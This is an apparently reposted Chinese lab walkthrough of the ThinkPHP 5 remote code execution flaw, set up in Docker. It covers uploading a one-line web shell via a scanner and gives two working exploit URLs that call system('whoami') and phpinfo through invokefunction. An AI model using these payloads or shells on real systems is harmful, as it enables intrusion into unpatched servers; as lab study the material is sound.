目录

常见框架漏洞—Thinkphp

1.搭建环境

cd /www/wwwroot/thinkphp/5-rce/

docker-compose up -d

2.访问我们搭建的环境

3.复制网站url到蓝鲸去测试漏洞

发现了两个漏洞

其中一个得到了一些信息

另一个漏洞我们在getshell中输入一句话木马,然后getshell,给我们生成了一个文件并上传到了文件,然后我们尝试访问

4.访问成功,然后我们传参

执行成功!

5.在url中输入:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

可以执行我们的系统命令

6.输入;

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

可以执行我们的代码

本文是转载文章,点击查看原文
如有侵权,请联系 xyy@jishuzhan.net 删除
相关推荐
网络抓包与爬虫16 分钟前
android应用崩溃了,通过崩溃手机连接电脑查找日志方法
websocket·网络协议·tcp/ip·http·网络安全·https·udp
郭涤生1 小时前
Chapter 3: Programming Paradigms_《clean architecture》notes
java·开发语言·c++·笔记
Hanson Huang1 小时前
23种设计模式-模板方法(Template Method)设计模式
java·设计模式·模板方法模式·行为型设计模式
woai33641 小时前
设计模式-单例模式
java·开发语言·单例模式
始终奔跑在路上2 小时前
Spring Initializr搭建spring boot项目
java·开发语言·spring boot·spring·软件开发
寒冰碧海2 小时前
JDK 17 + Spring Boot 3 全栈升级实战指南--从语法革新到云原生,解锁企业级开发新范式
java·spring boot·云原生
程序猿chen2 小时前
第二重·纵横篇:Kubernetes御剑术与云原生护体罡气
java·git·后端·程序人生·云原生·容器·kubernetes
iOS技术狂热者2 小时前
Flutter Mac上使用VSCode支持Flutter开发
websocket·网络协议·tcp/ip·http·网络安全·https·udp
青云交2 小时前
Java 大视界 -- Java 大数据在智慧港口集装箱调度与物流效率提升中的应用创新(159)
java·大数据·物联网·智慧港口·大数据分析·集装箱调度·物流效率
Aphelios3803 小时前
Java全栈面试宝典:JVM与Spring核心模块深度解析
java·开发语言·jvm·spring·面试